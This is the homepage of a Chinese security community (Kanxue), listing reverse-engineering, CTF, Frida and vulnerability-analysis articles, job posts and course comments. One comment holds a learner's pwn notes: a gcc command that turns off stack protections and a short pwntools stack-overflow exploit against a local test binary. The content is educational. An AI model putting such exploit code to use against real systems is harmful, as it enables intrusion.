首页
论坛
课程
招聘
企服 专栏 CTF 题库 众测 排行榜 知识库 工具下载 看雪峰会 看雪20年 看雪商城
企服平台
看雪知识库
工具下载
推荐课程
换一批  |  更多
推荐课程
《安卓高级研修班(网课)》月薪两万计划[春季班]
推荐课程
《安卓高级研修班(网课)》月薪三万计划[秋季班]

iOS 14/iPadOS 14 Beta 2测试版更新;我国两数据库泄露约500万条记录;恶意软件FakeSpy再现威力升级

今日凌晨,苹果向用户推送了iOS 14/iPad OS 14 开发者预览和公测版 Beta 2 版本,对细节进行了诸多调整。
作者 : Editor 来源:专栏
已有 1438 人阅读・19小时前

[原创]举杯邀Frida,对影成三题

在7月建党节之际做了几道作业,回想起学习中国共产党18年革命斗争的历史经验时书本中指出这样一句话:“统一战线、武装斗争、党的建设,是中国共产党在中国革命中战胜敌人的三大法宝”。
作者 : 一颗金柚子 来源:论坛
21小时前

[原创] 记一次so文件动态解密

整个程序基本上就是一个 动态注册 + so函数加密 的逻辑,中间加了一些parser的东西。主要考察了elf文件结构的一些知识以及在攻防对抗中防止IDA静态分析的姿势
作者 : 小白abc 来源:论坛
21小时前

[原创]一种枚举系统热键的思路及代码实现(Win7

现在使用全局快捷键的软件越来越多,经常遇到快捷键被占用的情况,想找出被谁占用了,网上找了一些工具,不过都不支持新版本的Win10。于是自己写了一个(支持Win7到最新的Win10 2004 32/64位,XP就不考虑了),本文顺带记录一下分析思路。
作者 : 深山修行之人 来源:论坛
1天前
推荐职位
换一批  |  全部职位
游戏反外挂职位(PC方向,初,中,高,专家皆可)
经验不限学历不限
30k以上
上海铭桃互联网科技发展有限公司
未融资/上海
高级安全运维工程师
3-5年学历不限
20-30k
北京天融信网络安全技术有限公司
上市公司/长沙
软件开发工程师
经验不限本科
12-20k
北京深思数盾科技股份有限公司
未融资/北京

[原创]win10 1909逆向(反向计算windows内核内存布局及代码实现)

在最新的windows版本中,内存动态并且很多在32位下的变量符号,windbg下如今都没有了,变成了类似qword_1404687D8这样的东东,对于逆向内存的同学来说,非常不便,但是Windows为了提高效率来进行地址判断的前提下还是给我们留下了一条门缝,我们可以利用此机制反向推导出一些重要的内存布局。
作者 : 学技术打豆豆 来源:论坛
1天前

[原创]SCTF2020 逆向 Orz 出题与解题思路

开始说下我的 Orz 题目的出题思路,就是很直来直去的算法逆向题目,没加什么混淆,只用了 Visual Studio 的 release 优化,算法和加密总共两部分。
作者 : 0x指纹 来源:论坛
1天前

[原创]从三道题目入手入门frida

题目本身都没有加壳没有混淆,主要逻辑就是输入flag,程序本身利用hash加密后与程序已有密文进行对比,细节方面略有不同,但大体来说就是爆破,整个过程逻辑很清晰,都不难,基本上都是Frida一把梭。
作者 : 小白abc 来源:论坛
1天前

看雪讲师招募

看雪社区人才辈出,如何搭建一个平台和桥梁,将大牛与学习者建立联系,让牛人将其所掌握的知识和技能分享给新人,促进知识的传承,是我们一直在考虑的问题。 看雪学院课程系统就是为解决上述问题而开发出来的。我们准备推出一套精品课程,专门为不同阶段的学习者量身定制,为在学海中迷茫不知所措的学者指明方向。

[原创]Frida 入门小练习

flag的求解都是通过爆破长度为5位的字符串(只包含数字),求其hash1+salt的摘要与程序中硬编码的密文进行比较,非常适合Frida入门。
作者 : ychangeol 来源:论坛
1天前

[原创]使用Frida简单实现函数粒度脱壳

题目中的APP实现了自定义ClassLoader导致默认版本Fart无法正常脱壳,需要自己定制。这里尝试使用Frida进行脱壳,脚本完全模仿默认版本的Fart运行流程进行编写,当然很多函数Frida完全没修改源码来的直接方便。这里也是为了熟悉下Frida所以进行的尝试,很多函数也都是直接用Frida编码实现,比如解析Dex中类,计算Dex函数代码长度等,相对于hanbing老师的Frida脱壳麻烦很多。水平太差只能用笨方法了。
作者 : 无造 来源:论坛
1天前

[原创]Frida加载和启动XServer

XServer是我常用的通信协议分析工具,是一个Xposed插件,可能有些同学也在用。然而Xposed的使用空间受限,不但很多应用对其做了检测,去做绕过有时很麻烦,而且Xposed无法在一些特殊的定制安卓系统上使用。
作者 : Monkeylord 来源:论坛
1天前

中国厂商被群喷不尊重开源协议;严重F5 BIG-IP漏洞影响阿里云等云平台;前雅虎工程师入侵6000账号被判缓刑

近日,有外国用户指出我国电子书厂商文石明违反 GPL v2 开源协议,拒绝发布其电子书设备源码,这瞬间引起外国网友对中国厂商的群喷。
作者 : Editor 来源:专栏
已有 5160 人阅读・1天前

[原创]分析钓鱼邮件搭载的Excel 4.0恶意宏

工欲善其事必先利其器,首先既然遇到的是宏病毒文件,所以本地得装好office,本文使用的环境为office2016,之后打开Excel。额,咋和平时看到的Excel表格不一样?如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容,本质就是诱惑用户来启用宏,所以文档存在宏代码 ...
作者 : jishuzhain 来源:论坛
1天前

[原创]ELF Format

ELF 文件是Linux以及Unix系统下的标准二进制文件格式。ELF 文件包含可执行文件、动态链接文件、目标文件、内核引导镜像文件等[1](#refer-anchor)。ELF文件一般采用的后缀有:none, .axf, .bin, .elf, ...
作者 : greagen 来源:论坛
2天前

Win10背景图片工具易被黑客滥用;辽宁首台“天玥”国产计算机下线;秃头生成器让你get 张东升同款发型

近日,b 站 Up 主 MarsLUL 用英伟达开源的 StyleGAN ,自制了一款秃顶生成器,可以在保持人脸基本不变的情况下,从发量浓密的现在,分分钟看到二十年后发量稀疏的自己,让你一键get张东升同款发型。
作者 : Editor 来源:专栏
已有 8901 人阅读・2天前

[原创]CTF两道题(逆向入门 love)

打开题会看到让下载一个exe 文件,下载完成后,打开运行,先观察一下特征,在进行调试,这是一贯的套路,但是在这个题上,我翻车了......
作者 : tutuj 来源:论坛
2天前

原创 | Ripple20:Treck TCP/IP协议栈漏洞分析与验证(附视频)

国外安全研究人员在由Treck开发的TCP/IP协议栈中发现了多个漏洞,这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(...
作者 : ADLab 来源:专栏
已有 7756 人阅读・2天前

UPnP协议CallStranger漏洞影响数百万设备

该漏洞允许攻击者绕过内网的数据防泄露系统(DLP)进行数据逃逸,可导致敏感数据泄露,并且可对设备所在内部网络进行扫描,甚至能劫持设备进行分布式拒绝服务(DDOS)攻击。根据CallStranger漏洞原理,启明星辰ADLab以某款智能电视作为测试目标,对CallStranger漏洞的危害性进行了演示分析。
作者 : ADLab 来源:专栏
已有 8107 人阅读・2天前

[原创] Galgame汉化中的逆向(二):系统字库与文字编码

上节我们谈了谈如何找到解密文本的函数,以及如何来反汇编分析。这节来谈谈有关汉化调用系统字库与编码的问题、如何解决乱码、以Windows上常用的相关函数。
作者 : devseed 来源:论坛
2天前

[原创]Galgame汉化中的逆向(三):自定义字库分析

上节谈了一下一般pc游戏的文字编码与系统字库的调用,但是主机游戏和部分pc游戏通常自带字库,这些字库有的是标准格式,而有的则是自定义格式。此篇教程将以一种不同寻常格式的texture font为例,谈谈如何来分析自定义字库。
作者 : devseed 来源:论坛
2天前

[原创] 分享一个最近新撸增强版的绕过Android/iOS的dlopen/dlsym限制的dlfunctions库

具体实现原理还是比较简单的,主要还是借鉴了一种绕过Android P对非SDK接口限制的简单方法的思想和实现方式。虽然这篇文章中主要目的是为了绕过hide API,不过它里面使用的将自己假装成系统调用的方式,一样可以用到System.loadLibrary上去,让系统以为是系统自身在调用System.loadLibrary。
作者 : waruqi 来源:论坛
3天前
加载更多
实时热点
1 Thunderbolt 4 发布
2 华为技术有限公司申请大量有关HarmonyOS的商标
3 苹果严查版号满一周:App Store 下架近 8000 款游戏,仅 735 款游戏上架
4 谷歌向符合条件的设备用户推送Android 11 Beta 2
5 羊毛客恶意“薅”电商 黑灰产业链“失控”引关注
推荐专栏
关注更多
课程评论
更多课程
hackbs
Pwn        学习第三课打卡!

知识点:
-  ①CANNARY(栈保护)    {用来保护栈溢出,Cannary  found表示开了保护}
-  ②FORTIFY                                          {比较冷门,防止缓冲区溢出}
-  ③NX(DEP)                          {不让执行ShellCode操作}
-  ④PIE(ASLR)                    {Win上称为DEP  地址空间分布随机化}
-  ⑤RELRO                                            {设置符号重定向表格为只读,绑定所有动态符号,防止GOT攻击}

Linux下检查保护机制的命令:
checksec  test

[*]  '/home/lee/test'
        Arch:          i386-32-little
        RELRO:        Partial  RELRO
        Stack:        No  canary  found
        NX:              NX  disabled
        PIE:            No  PIE  (0x8048000)
        RWX:            Has  RWX  segments

关闭所有保护编译指令:
gcc  -no-pie  -fno-stack-protector  -z  execstack  -m32  -o  test  test.c

Exp:
from  pwn  import  *
#--------------------------------------
#init
testProcessHandle  =  process("./test")

#calc  ebp  offset
epbOffset  =  0x28  +  0x4

#exp  func  addresss
expAddress  =  0x08048456

#payload
payload  =  'A'  *  epbOffset  +  p32(expAddress)
#--------------------------------------


#  EntryPoint    Exp  Coding  By  Lee.
def  main():
        testProcessHandle.sendline(payload)
        testProcessHandle.interactive()
       
#  let's  go 
if  __name__  ==  "__main__":
        main()
wx_kx40495
内容很好,有一点建议,现在的网站基本都是https的了,视频中的代理抓包改数据的方案有点过时了,希望给点新的方案
wx_少年_432
30多岁了还在考研?
凯狼
老师讲的很好,希望后期可以出进阶、高级的课程!
radmanxu
问题解决了,https://www.jianshu.com/p/29c99274ff85
论坛最新回帖
前往论坛
13分钟前
[原创]开源自己开发的一些工具--封包嗅探工具SnifferView
15分钟前
[原创]最近拿到一个ROM
20分钟前
[踩楼送门票] MOSEC 2020 | 议题全纪录
26分钟前
[原创]【梦幻开讲了】带伙伴们入手计算机病毒分析-第一天
55分钟前
[原创] 分享一个最近新撸增强版的绕过Android/iOS的dlopen/dlsym限制的dlfunctions库
1小时前
[原创]frida入门总结
1小时前
[原创] 震惊!一男子居然用杀软做出这种事情!
1小时前
[原创]一个简单的逆向+注册机源码
合作伙伴
域名:加速乐 | SSL证书:亚洲诚信 | 安全网易易盾| 同盾反欺诈| 服务器:绿盟科技
©2000 - 2020 看雪学院 / 沪ICP备16048531号-1 / 沪公网安备 31011502006611号

官方公众号

官方微博

官方QQ